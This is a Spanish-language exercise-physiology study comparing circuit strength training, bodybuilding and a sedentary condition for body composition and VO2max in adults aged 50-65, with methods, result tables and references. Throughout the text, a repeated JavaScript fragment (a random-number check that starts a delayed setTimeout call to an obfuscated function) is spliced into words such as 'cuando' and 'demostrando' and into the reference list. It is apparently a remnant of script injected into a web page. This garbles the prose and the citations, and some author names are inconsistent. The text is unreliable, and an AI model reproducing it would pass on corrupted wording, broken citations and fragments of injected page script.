EFECTO DEL ENTRENAMIENTO DE CIRCUITO DE FUERZA, DE BODY-BUILDING Y DEL SEDENTARISMO, SOBRE EL PORCENTAJE EN EL COMPARTIMENTO MUSCULAR (Pm(%)) Y COMPORTAMIENTO GRASO (Pg (%)), Y EN LACAPACIDAD MÁXIMA DE OXÍGENO (VO2máx) EN LA SALUD DE ADULTOS DE 50-65 AÑOS.

Autor:Emiliano Blanco Valero.

Durante el envejecimiento, se da un cambio fisiológico en diferentes parámetros, dándose una disminución del VO2max, asociado a una disminución de masa muscular, y además de un aumento de masa grasa, por lo que en este estudio se pretende comprobar un entrenamiento adecuado para retener este proceso. Los entrenamientos manipulados son los circuitos de fuerza orientados a una fuerza submáxima y fuerza resistencia, y el body-building orientado a la fuerza máxima y fuerza explosiva, viendo como varia la VO2max, medido en el test de bruce a través de la FC, y el porcentaje del compartimento graso y del compartimento muscular medido por antropometría, comparado con sedentarios, a través de un diseño entregrupo multigrupo con un pretest y un postest en el que a través de las técnicas de balanceo, bloqueo y aleatorización pudimos hacer comparaciones entre tres grupos de adultos proporcionales de 50 a 65 años, formado cada grupo por 15 hombres y 10 mujeres. Los resultados obtenidos durante las 12 semanas, mostraron como los que entrenaron circuitos de fuerza obtuvieron mayores ganancias en el Pm(%), VO2max, y una disminución de Pg(%), que los que entrenaron body-building, los cuales obtuvieron mayor masa magra, pero con un mayor peso total, siendo estos beneficios mejor adquiridos por los hombres que por las mujeres. Por lo que se aconseja para luchar contra los riesgos de la obesidad, la baja V02máx, y de la atrofia muscular, el entrenamiento de circuitos de fuerza, produciendo una ganancia de independencia funcional y calidad de vida.

INTRODUCCIÓN.

La sarcopenia, llamado así al efecto de atrofia muscular, se refiere a la reducción cuantitativa de la masa muscular y por ello lleva implícito la disminución de la fuerza así como de la tolerancia al ejercicio. Con el transcurrir de los años, nuestro cuerpo sufre una serie de cambios en la composición corporal que provoca un aumento del peso graso y un descenso de la masa magra. Esta pérdida de masa muscular (componente de la masa magra) asociada con el envejecimiento, puede deberse a los cambios estructurales del aparato músculo esquelético, a las enfermedades crónicas y sus tratamientos, a la atrofia por desuso o a la malnutrición (Evans y Campbell, 1999).

La relación existente entre el VO2max y la masa muscular ya fue definida por Fleg y Lakatia (1988) demostrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando una relación entre el VO2max y la masa muscular calculada mediante la excreción urinaria de  creatinina en 24 horas.

Otros autores como  Rogers, Hagberg, Martin (1990) han demostrado que la masa grasa no influye en el VO2max y que las variaciones de este valor, se relaciona con la masa libre de grasa (FFM). Por lo tanto deberíamos suprimir este peso de la ponderación del VO2.

El incremento de la masa muscular hace que el metabolismo en reposo sea mayor, por lo que será más difícil la acumulación de grasa corporal, de modo que conseguimos obtener una composición corporal óptima. También puede ayudar a mejorar la sensibilidad a la insulina y el metabolismo energético (Fleg y Lakatia, 1988)

El entrenamiento de resistencia muscular aumenta el metabolismo de reposo, aumenta el gasto calórico, la masa libre de grasa mejora la tolerancia a la glucosa y mejorandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la densidad ósea, masa muscular, fuerza, equilibrio y el nivel total de actividad física del individuo, disminuye el riesgo de fracturas por osteoporosis en mujeres pós-menopausicas, además de otros beneficios. (Fiatarone, O’Neill, Ryan, Clements, Solares, Nelson, Roberts, Kehayias, Lipsitz y Evans, 1994)

De acuerdo con Feigenbaum y Pollock (1999) el uso de máquinas es preferible al uso de pesos libres en el anciano pues son mas seguras, evitan lesiones, permiten incrementos bajos de peso, protegen la columna vertebral y evitan la maniobra de valsalva. Por lo que este estudio va enfocado al entrenamiento en gimnasio.

En estudios previos se ha demostrado que en personas de entre 60 y 70 años se logra recuperar la capacidad funcional y la potencia muscular de 20 años antes con sólo realizar un entrenamiento centrado en el desarrollo de la fuerza y la masa muscular de 4 meses de duración. (Newton, Häkkinen, Häkkinen, Mccormink, Volek y Kraemer, 2002)

El VO2max declina con la edad a razón de aproximadamente 1% anual entre los 20 y loa 70 años de edad. Flegg y Lakatia (1988) mostraron que la masa de músculo esquelético determinaba la mayor parte de la variabilidad del VO2max en varones y mujeres mayores de 60años. Los estudios han demostrado que la actividad física atenúa la declinación del VO2max relacionada con la edad. Sin embargo, parámetros predictivos de esta declinación del VO2max asociado con la edad; en varones, el VO2max disminuye a la misma velocidad en atletas y en los individuos sedentarios, y  35% de la disminución se atribuye a la sarcopenia o pérdida de masa muscular.

La cantidad de grasa que acumulan nuestros cuerpos cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando crecemos y envejecemos depende de la dieta y de los hábitos de ejercicio individuales, además de la herencia. La cantidad de relativa de grasa corporal aumenta con la edad después de alcanzar la madurez física. En el mundo occidental, el hombre medio de 35 años ganará entre 0,2 y 0,8 Kg de grasa cada año hasta su quinta o sexta década de vida. (McArdle, Katch y Katch( 1991).

Pasada la edad de 30 años, la masa magra también disminuye progresivamente. Esto es la consecuencia principalmente de la menor masa muscular y de la pérdida de minerales óseos. Después de la edad de 60 años, se reduce el peso corporal total a pesar de la creciente proporción de grasa corporal. Como es de esperar, el contenido en grasa corporal de las personas físicamente activas es significativamente menor que en hombres y mujeres sedentarios de la misma edad. También se aprecia en aquellas personas que continúan realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando entrenamiento con pesas aumentan su porcentaje de peso en masa magra y disminuye el porcentaje de grasa. (Martín Rodríguez, 2006).

La disminución progresiva en el consumo de oxígeno después de los 15 años aproximadamente, se estima en 0,4 ml./Kg/min. cada año. Existe una diferencia clara entre el ritmo de disminución del VO2máx. con el envejecimiento en individuos sedentarios comparados con otros activos. Los individuos sedentarios tienen un ritmo de deterioro del VO2máx., casi el doble con el paso de los años (Bruce, R. 1984; Saltin, B. 1990; Engels et. al. 1998). La disminución de la capacidad de resistencia con la edad se debe en gran parte a varias reducciones en las funciones fisiológicas implicadas en el transporte del oxígeno relacionadas con la edad. Un cambio bien documentado en la función cardiovascular es la disminución de la frecuencia cardiaca máxima y en el volumen sistólico.

Frontera, Meredith, O’Reilly, Knuttgen y Evans,(1988)informaron de un incremento del 5% en el Vo2máx medido en cicloergómetro después de 12 semanas de entrenamiento de fuerza en mayores sanos de entre 60-72 años.

La mayor parte de los métodos preventivos y de mejora de condición física para las personas mayores están realizados con ejercicios de intensidad media, donde predominan para su realización los aportes energéticos aeróbicos, bien sea en el aire libre, en los gimnasios o en las piscinas (Ruoti, Troup y Berger, 1994).

Las intensidades más usadas y que se relacionan con incrementos considerables de la fuerza o masa muscular en estas edades, se encuentran entre el 60% y el 80% de 1 RM

Los programas de entrenamiento de moderada a baja intensidad, realizados con un alto número de repeticiones (entre 15 y 20 o más), aparecen como los más efectivos para mejorar tanto la resistencia muscular absoluta como la relativa (Anderson y Kearny, 1982)

La fuerza máxima y la fuerza explosiva son elementos indispensables en el entrenamiento para el deporte de competición. Pero la capacidad de manifestar fuerza, especialmente fuerza máxima y explosiva, es necesaria en la realización de muchas tareas de la vida cotidiana como levantarse de una silla, subir escaleras o saltar(Bassey y Harries, 1993).

Por lo que deberían formar parte del entrenamiento de fuerza una vez acondicionados los sujetos.

El entrenamiento de fuerza en adultos y mayores responde a una mayor respuesta neuromuscular y mayor reclutamiento de miofibrillas, más que ha hipertrofia muscular. (Campbell, Borrie, Spears, 1989).

Así que con todas las investigaciones se sugiere el siguiente problema, y la siguiente hipótesis ha contrastar:

¿Qué efecto tiene en la salud de adultos de 50-65años un entrenamiento de circuitos de fuerza, de body-building y el sedentarismo sobre el porcentaje en el compartimento muscular (Pm(%)), compartimento graso (Pg(%)) y en la capacidad máxima de oxígeno (VO2max) medido mediante el test de bruce a través de la FC y el cálculo del porcentaje de los cuatro compartimentos a partir de un estudio antropométrico?

Según los resultados de investigaciones precedentes, un programa de circuitos de fuerza es más adecuado para la salud que un programa de body-building, y este a su vez del sedentarismo, para adultos de 50-65años, en el aumento del (Pm(%)) y  (VO2max) y disminución del (Pg(%)).

MÉTODO

Sujetos

La elección de los sujetos, es de forma aleatoria, obteniendo una muestra de 75 sujetos de entre 50 y 65 años, en el que el 60% son hombres y el 40% son mujeres, a los cuales se le pidieron unos requisitos explicados en el procedimiento, para ver si eran o no aceptables para el estudio, el cuál se promocionó a través de una charla planificada dentro de un programa para adultos en Granada.

A estos sujetos se le hacen un estudio antropométrico y el protocolo de Bruce, con su previo permiso, obteniendo los siguientes datos de cada uno de ellos: la estatura, el diámetro de muñeca, el diámetro del fémur, la edad, el peso, el pliegue cutáneo tricipital, Pc subescapular, Pc suprailiaco y el Pc abdominal, además de la FC de reserva y la FC máxima para la edad (miyasita), para  la obtención de los Cuatro Compartimentos y el VO2 max, para la elaboración del pretest ( véase la tabla 1y 2), y así poder distribuirles a los dos grupos de entrenamiento de forma proporcionada, en el que al cabo de tres meses, ver los resultados obtenidos, el postest, pudiendo saber que entrenamiento es el más adecuado según los parámetros estudiados.

Diseño

El diseño empleado para el tratamiento de los datos, es dentro de los de entre-grupos, un diseño multi-grupo, en el que tenemos de variable independiente el tipo de entrenamiento, con tres niveles, un grupo que entrenará la fuerza submáxima y fuerza-resistencia ( circuitos de musculación) y otro que entrenará la fuerza máxima y la fuerza explosiva (body-building) y un grupo sedentario, para ver como influye en las variables dependientes; VO2max medido en el test de bruce, Pg(%) y Pm(%) con el cálculo de los cuatro compartimentos, dentro de un estudio antropométrico.

Para eliminar la fuente principal de contaminación inicial de grupos, se trabaja sobre la muestra:

La técnica de balanceo: Cada grupo es una representación de la muestra. En el que debemos de respetar el porcentaje en los grupos del 60% de hombres y 40% de mujeres, por lo que obtenemos de 75 sujetos de muestra, tres grupos de 15 hombres y 10 mujeres.

La técnica de bloqueo y aleatorización: Según los resultados obtenidos en el pretest, se hace dos rankings o clasificaciones uno para hombres y otro para mujeres, en el que en la clasificación de hombres hay 15 bloques de tres en tres, y en el de las mujeres 10 bloques de tres en tres, donde aleatoriamente se van distribuyendo en los tres grupos del estudio.

Aparatos y/o material

Los instrumentos de medida utilizados para los estudios antropométricos son sencillos en su manejo, precisos y homologados. Y son los siguientes:

Tallímetro.- Escala métrica apoyada sobre un plano vertical y una tabla o plano horizontal con un cursor deslizante para contactar con la parte superior de la cabeza o vértex. Precisión 1 mm. Se emplea para medir la estatura y talla sentado del estudiado. Se calibrará periódicamente mediante la comprobación con otra cinta métrica de la distancia entre la horizontal y diferentes niveles del cursor deslizante.

Báscula.- Balanza pesa-personas con precisión de 100 gramos. Utilizada para obtener el peso del estudiado. Para su calibración se utilizarán pesas de diferentes kilos, abarcandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la escala de la muestra que se va a medir (bajo, medio y alto).

Antropómetro.- Es una escala métrica don dos ramas, una fija y otra que se desplaza. Las ramas pueden ser rectas y curvas con olivas. Precisión 1 mm. Se miden segmentos corporales, grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes diámetros y alturas. La articulación de la escala métrica, con nuevos segmentos, permite medir longitudes de hasta 2 metros.

Cinta antropométrica.- Debe ser flexible, no elástica, metálica, anchura inferior a 7 mm, con un espacio sin graduar antes del cero y con escala de fácil lectura. El muelle o sistema de recogida y extensión de la cinta debe mantener una tensión constante y permitir su fácil manejo. Se recomienda que las unidades de lectura estén en centrímetros exclusivamente. Precisión 1 mm. Se utiliza para medir perímetros y para localización del punto medio entre dos puntos anatómicos.

Paquímetro o compás de pequeños diámetros.- Compás de corredera graduado, de profundidad en sus ramas de 5º mm, con capacidad de medida de 0 a 250 mm, y precisión de 1 mm. Se utiliza para medir pequeños diámetros.

Lipocalibre.- Con capacidad de medida de 0 a 48 mm, y precisión de 0.2 mm. La presión en sus ramas es constante (10 g/mm2) cualquiera que sea su apertura. Se utiliza para medir panículo adiposo. Un método simple para calibrar este instrumento es fijarlo a un torno y suspender pesos desde la rama inferior. El compás debe ser ajustado para que las ramas permanezcan abiertas en cualquier posición, manteniendo una presión de 10 g/mm2 para los diferentes pesos de calibración.

Lápiz dermográfico para señalar los puntos anatómicos y marcas de referencia.

Disponer de un programa informático de Excel para el posterior tratamiento de los datos, debido al alto número de medidas que se realizan.

Para la obtención del Cálculo de los cuatro compartimentos (escuela de Rocha) se hará en un programa informático, sabiendo las siguientes fórmulas:

-Pt = Pg + Po + Pr + Pm ;

Pt= Peso corporal total, Pg= Peso del compartimento graso, Po= Peso del compartimento oseo, Pr= Peso residual y Pm= Peso del compartimento muscular.

- Compartimento Graso (Pg) = 5.783+ (0,153x(a))   ;

Siendo a(mm)= Pc tricipital+ Pc subescapular+ Pc suprailiaco + Pc abdominal

- Compartimento Oseo (Po)= 3,02 + (H elevadoa 2 x R x F x 400) elevado a 0,712

Siendo H= estatura (m), R= diámetro de la muñeca (m) y F= diámetro del fémur (m)

- Compartimento Residual (Pr); en hombres; = (Pt x 24,1)/100 y en mujeres (Pt x 20,9)/100.

- Compartimento Muscular (Pm) = Pt – ( Pg + Po + Pr)

Para la realización del protocolo de Bruce:

Pulsómetro polar rs200sd black, con transmisor wearlink, con las siguientes funciones destacables para el estudio: Transmisión sin cables ECG, frecuencia cardiaca máx. (basada en la edad), fecha del ejercicio transmisión de datos , total del ejercicio (Tiempo), cronómetro, 24 archivos de memoria.

Tapiz rodante de la universidad de Granada, en el cuál variar la pendiente y la velocidad.

Y portátil donde poder representar los datos obtenidos de FC a VO2max.

Y para los entrenamientos, un gimnasio, con las maquinarias necesarias para la realización de los ejercicios descritos en el procedimiento, y todo material necesario para la higiene y seguridad de los sujetos.

Procedimiento

Con la colaboración del departamento de EF de Granada, se organizó una campaña para la obtención de la muestra del estudio, a través de carteles puestos en sitios estratégicos y accediendo a escuelas de adultos y programas de mantenimiento, y sobretodo el efecto de boca en boca, quedar en el aula magna de la Facultad de Ciencias de la Actividad Física y del Deporte, en el que ofertamos para los interesados tres meses en un sitio residencial de convivencia entre adultos de 50-65 años, donde además de otros fines, aprovechar ese tiempo para el estudio, en el que previamente habían sido informados.

Para entrar en la muestra aleatoria de los 75 sujetos dentro del cuál 30 mujeres y 45 hombres de entre 50-65años, además de tener esa edad, los requisitos eran de no sufrir hipertensión e hipotensión, no tener antecedentes de problemas cardiacos, ni problemas de movilidad articular, ni osteoporosis, ni artrosis. A todos los sujetos que participaron en el estudio se les realizó previamente un reconocimiento con el fin de detectar cualquier patología que fuera contraindicada para el esfuerzo al que se le iba a someter.

Antes de empezar con el estudio, todos los investigadores comprobamos la fiabilidad de todos los instrumentos de medida, y comprobandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con cinco sujetos voluntarios fuera de la muestra, el que todos obtuviésemos lo más preciso posible la misma medida en ellos. Controlandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando que todas nuestras acciones fuesen iguales, para rechazar la variable contaminante de los investigadores.

Una vez recogida la muestra nos organizamos una mañana antes de la marcha al sitio residencial para hacerles un estudio antropométrico (medirles la estatura, el peso, el diámetro de la muñeca, el diámetro del fémur, el pliegue cutáneo tricipital, Pc subescapular, Pc suprailiaco, y el Pc abdominal), apuntar la edad de cada sujeto, su FC en reposo y la FC max para la edad (miyasita) y medirles el VO2max siguiendo el protocolo de Bruce. Recogido estos datos se hace el pretest representandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando a cada sujeto su Peso, VO2max, Pg(%) y Pm(%).

A partir de aquí, teniendo tres grupos igualitarios, obtienes en el gimnasio el 1RM de los 75 sujetos, sabiendo que 1RM= (Peso levantado x 0,0333 x rep. hasta el fallo) + Peso levantado. Al primer grupo experimental se le atribuye el siguiente entrenamiento durante tres meses; Un circuito de musculación basado en la fuerza submáxima y fuerza-resistencia, el cuál consiste en ejercitar todos los grupos musculares en una misma sesión, realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando un ejercicio para cada uno de ellos, entrenandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con una frecuencia de 3veces a la semana, dos series de 10 ejercicios, 12 repeticiones por ejercicio, y una intensidad del 65% de 1RM, con un descanso de 1:2, siendo los músculos a trabajar: femorales, cuadriceps, dorsales, pectorales, deltoides, tríceps, bíceps, gemelos, abdominales y lumbares, y con progresión. Y al segundo grupo experimental, un entrenamiento de desarrollo de la hipertrofia, el conocido como body-building, basado en fuerza máxima y fuerza explosiva, siendo también 3 sesiones a la semana, con 4 series de 4 ejercicios con 6 repeticiones, a una intensidad del 85% RM, con una recuperación de 2’ entre series, en la primera sesión semanal se hace, sentadilla, prensa atlética, fondos y extensores en máquina, en la segunda sesión press de banca en banco plano, press de banca en plano inclinado, press de banca en banco declinado y contractor, y en la tercera sesión remo sentado con agarre estrecho, jalón al pecho, remo con mancuernas y jalones con agarre invertido.

Estos entrenamientos son llevados a cabo, hasta llegar a las 12 semanas, en la cuál al día después de finalizar se hace las mismas medidas que en el postest que en el pretest, obteniendo otra vez tres tablas, una para el VO2max medido en  el protocolo de Bruce, la Pg(%) y la Pm(%) medido gracias a otro estudio antropométrico. Para así sacar la discusión y conclusión del estudio, pudiendo saber que entrenamiento es el más adecuado para esta población según los parámetros usados, y comparado con el sedentario.

Para minimizar errores, hemos conseguido que todos los sujetos tuvieran la misma alimentación, en el lugar residencial, durmiendo y descansandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando todos el mismo tiempo y en general, que hiciesen las mismas actividades dentro del programa de tres meses de convivencia, siendo la única diferencia entre ellos, el entrenamiento llevado a cabo, por lo que obtenemos una varianza primaria.

RESULTADOS

Los resultados del estudio muestran las diferencias que hay entre el entrenamiento de circuito de fuerza y el entrenamiento de body-building, en las variables de Porcentaje del Compartimento Graso, en el Porcentaje del Compartimento Muscular. Pudiéndose ver los resultados (tabla 1, tabla2, figura1, figura 2 y figura3).

En el porcentaje del compartimento graso, en el pretest, en las mujeres es de un 11,23 mayor que en hombres, disminuyendo en el postest, este porcentaje más en personas que entrenan circuitos de fuerza que en body-building, significativamente. Siendo todo lo contrario en el porcentaje del compartimento muscular, pero hay que tener en cuenta que los que entrenan body-boulding adquieren mayor peso que el que tenían, mientras que los otros lo disminuyen

En la capacidad máxima en oxígeno de 0-3min, en el pretest es menor en hombres que en mujeres, mientras que de 6-9min es menor en mujeres que en hombres. Por lo que la diferencia en estos tiempos es menor en mujers, en el postest esta difrencia se hace más grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande en personas que entrenan circuitos de fuerza que en los que entrenan body-boulding

DISCUSIÓN

En el estudio se puede observar, que un entrenamiento de circuito de fuerza enfocado en la fuerza-resistencia y fuerza submáxima, y un entrenamiento de body-building, enfocado a la fuerza máxima y fuerza explosiva, produce variaciones en el VO2máx, Pg(%) y Pm(%) durante 12 semanas.  Comprobandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando que las personas mayores reaccionan fisiológicamente tan bien como los jóvenes, pudiendo ver el gran progreso en este periodo.

En la variable de capacidad máxima de oxígeno, vemos como tenía razón Flegg y Lakatia (1988) en lo de que estaba relacionada con la masa muscular, puesto que los músculos para ser funcionales necesitan de un gran aporte de oxígeno. Pero por lo contrario  la masa grasa no influye en este resultado, aunque en el estudio hemos comprobado que una menor masa grasa proporcional al peso del sujeto esta relacionada con una mayor diferencia de VO2máx entre los 0-3minutos y 6-9minutos medidos en el test de Bruce, por lo que los sujetos que entrenaron body-boulding ganaron más masa muscular, lo cuál hace que el metabolismo basal en reposo se mayor por lo que es más difícil la acumulación de grasa, pero aún así los sujetos que entrenaron circuitos de fuerza  disminuyeron más la masa grasa, y proporcionalmente a su peso más masa muscular consiguiendo tener mejores resultados en V02máx.

Como sucede con la fuerza, la capacidad aeróbica (VO2) del hombre es superior a la de la mujer en un 33%, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando se refiere al peso total del cuerpo, pero es mucho menor (17%) cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la relación se establece con el peso magro, según han señalado Rogers, Hagberg, Martin (1990). Incluso existen autores, como Cureton, Collins, Hill y McElhansonc( 1988) quienes aseguran que las diferencias observadas se deben más al entrenamiento llevado a cabo (95%) que al factor sexual (5%). Las causas que podrían explicar dichas diferencias serían la menor talla y peso de la mujer, así como la de los órganos implicados en el mantenimiento de la capacidad aeróbica: corazón y pulmones, lo que daría lugar a la disminución de los volúmenes funcionales de ambos órganos (volumen sistólico y capacidad vital).

El consumo máximo de oxígeno (VO2max) está muy determinado por el entrenamiento. En general el del hombre es mayor (50-60% en valores absolutos, 15-30% al tener en cuenta las dimensiones corporales, 1-10% al referirse al peso libre de grasa. Una mujer entrenada puede llegar a tener un 25% más de VO2max que un hombre sedentario. Rogers, Hagberg, Martin (1990).

Las mejoras del VO2máx. con el entrenamiento son similares en los hombres y mujeres jóvenes y ancianos (Khort, Ehsani, Birge, 1997). Aunque los valores del VO2máx. previos al entrenamiento fueron, de promedio, menores para los sujetos ancianos, el incremento absoluto fue significativo en ambos grupos. Estas investigaciones indican que estos entrenamientos producen mejoras similares en la capacidad aeróbica de personas sanas en todo el intervalo de edades comprendidas entre los 20 y los 70 años.

Podría ser interesante que nuevas investigaciones estudiaran que entrenamiento sería más adecuado si el método de contraste o el entrenamiento en piscina aquagym, para las mejoras en el VO2máx, y en el porcentaje de los Cuatro Compartimentos, para personas desde 20 a 70 años. Con los mismos instrumentos de medida usados en este estudio.

CONCLUSIONES

Si analizamos los efectos que se producen en las variables antropométricas como es el porcentaje del cálculo de los compartimentos graso y muscular, y la capacidad de oxígeno máximo medido en el test de bruce, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando se aplican las variables independientes de entrenamiento en circuito de fuerza y de body-building, se ha podido determinar que la utilización del primer entrenamiento orientado a la fuerza submáxima y fuerza-resistencia es el mejor indicado para la disminución de la masa grasa, una mayor masa magra en proporción al peso, una menor V02 al principio de un ejercicio, una mayor resistencia al ejercicio consiguiendo un mayor V02máx al final del test de bruce, siendo estos beneficios adquiridos con más facilidad en hombres que en mujeres.

Por lo que sabiendo que un bajo nivel de VO2máx y la obesidad son de los mayores riesgos de mortalidad en nuestra población, sería aconsejable el circuito de fuerza para nuestros adultos y mayores, sabiendo además que estos responde mejor a una mayor respuesta neuromuscular y mayor reclutamiento de miofibrillas más que ha hipertrofía muscular.

Ocasionándome otra posible hipótesis, en que el entrenamiento de circuitos de fuerza puede mejorar el V02máx, el Pg(%) y el Pm(%), en personas con problemas de hipotensión y de hipertensión, más que en sedentarios, debido a sus moderadas cargas.

ANEXO

Tabla 1. Medias obtenidas en el pretest y en el postest en el Peso, y en el porcentaje del Compartimento Graso y del Compartimento Muscular. En personas de 50 a 65años.

Pretest
Variables N Peso (Kg) Compartimento Graso(Pg(%)) Compartimento Muscular(Pm%))
Hombres 45 86,2 25,44 38,02
Mujeres 30 76,8 34,67 31,34
Postest
Variables N Peso (Kg) Compartimento Graso(Pg(%)) Compartimento Muscular(Pm(%))
Hombres ( circuito de fuerza) 15 85,3 24,17 44,53
Mujeres ( circuito de fuerza) 10 76,6 33,05 34,87
Hombres ( body-building) 15 87,5 25,02 42,92
Mujeres ( body-building) 10 77,1 34,33 34,33
Hombres (sedentarios) 15 86,1 25,42 38,04
Mujeres ( sedentarias) 10 76,7 36,65 31,35

Tabla 2. Medias obtenidas en el pretest y en el postest en el Peso y  en la Capacidad máxima de oxígeno en 0-3minutos y de 6-9 minutos, hombres y mujeres de 50-65años.

Pretest
Variables N Peso (Kg) VO2 (ml/kg.min) 0-3min VO2máx (ml/kg.min)
Hombres 45 86,2 29,43 37,87
Mujeres 30 76,8 31,78 35,78
Postest
Variables N Peso (Kg) VO2 (ml/kg.min) 0-3min VO2máx (ml/kg.min)
Hombres ( circuito de fuerza) 15 85,3 24,53 40,12
Mujeres ( circuito de fuerza) 10 76,6 27,62 39,23
Hombres ( body-building) 15 87,5 26,51 39,59
Mujeres ( body-building) 10 77,1 28,33 37,43
Hombres (sedentarios) 15 86,1 29,41 37,88
Mujeres ( sedentarias) 10 76,7 31,75 35,79

Figura 1. Medias obtenidas en el pretest, en el Porcentaje del Compartimento Graso y en el Compartimento Muscular en Hombres y Mujeres de 50-65años.

Figura 2. Medias obtenidas en el pretest, en la capacidad de oxígeno en

0-3minutos y la capacidad máxima de oxígeno, en Hombres y Mujeres de 50-65años.

Figura 3. Medias obtenidas en el postest, en el Porcentaje del Compartimento Graso y en el Compartimento Muscular, en la Capacidad de Oxígeno en

0-3minutos y la VO2máx, en Hombres y Mujeres de 50-65años.

REFERENCIAS BIBLIOGRÁFICAS

1.  Anderson, T., andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and J. T. Kearney. (1982). Effects of three resistance training programs on muscular strength andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and absolute andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and relative endurance. Res. Q. 53:1-7

2.  Bassey, E.J., andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and U.J. Harries. (1993). Normal values for handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andgrip strength in 920 men andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and women aged over 65 years, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and longitudinal changes over 4 years in 620 survivors. Clin. Sci. (Colch.). 84: 331-337.

3.  Campbell A, Borrie M, Spears G. (1989). Risk factors for falls in a community-based prospective study of people 70 years andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and older. J Gerontol; 44: M112-7

4.  Cureton, K. J., M. A. Collins, D. W. Hill, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and F. M. McElhansonc.(1988). Muscle hypertrophy in men andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and women. Med. Sci. Sports Exer. 20:338-344.

5.  Evans, W.J. (1999). Exercise training guidelines for the elderly. Medicine andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and science in sports andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and exercise, 31(1), 12-17.

6.  Feigenbaum, M. S., andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and M. L. Pollock. (1999) Prescription of resistance training for health andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and disease. Med. Sci. Sports Exerc. 31:38-45

7.  Fiatarone MA, O’Neill EF, Ryan ND, Clements KM, Solares GR, Nelson ME, Roberts SB, Kehayias JJ, Lipsitz LA, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Evans WJ (1994). Exercise Training andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Nutritional Supplementation for Physical Frailty in Very Elderly People. The New Englandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Journal of Medicine Vol 330: 1769-1775

8.  Flegg, JL., Lakatia, EG. (1988). Role of muscle loss in the age-asociated reduction in VO2max. J Appl Physiol; 65:1147-51

9.  Frontera WR, Meredith CN, O´Reilly KP, Knuttgen HG, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Evans WJ (1988). Strength conditioning in older men: skeletal muscle hipertrophy andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and improved function. J Appl Physiol Vol 71: 644-650

  1. Kohrt WM, Ehsani AA, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Birge SJ (1997). Effects of exercise involving predominantly either joint-reaction or ground reactions forces on BMD in older women. J Bone Miner Res Vol 12: 1253-1261
  2. Martín Rodríguez, M. (2006). Influencia de un programa de actividad física sobre aspectos físicos y psicológicas en personas de más de 55 años en la población del Algarve. Tesis del Departamento de Educación física y Deporte, Universidad de Valencia.
  3. McArdle, W. D., Katch, F. I., andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Katch, V. L. (1991). Exercise Physiology: Energy, Nutrition andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Human Performance. Malvern (USA): Lea andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Febiger
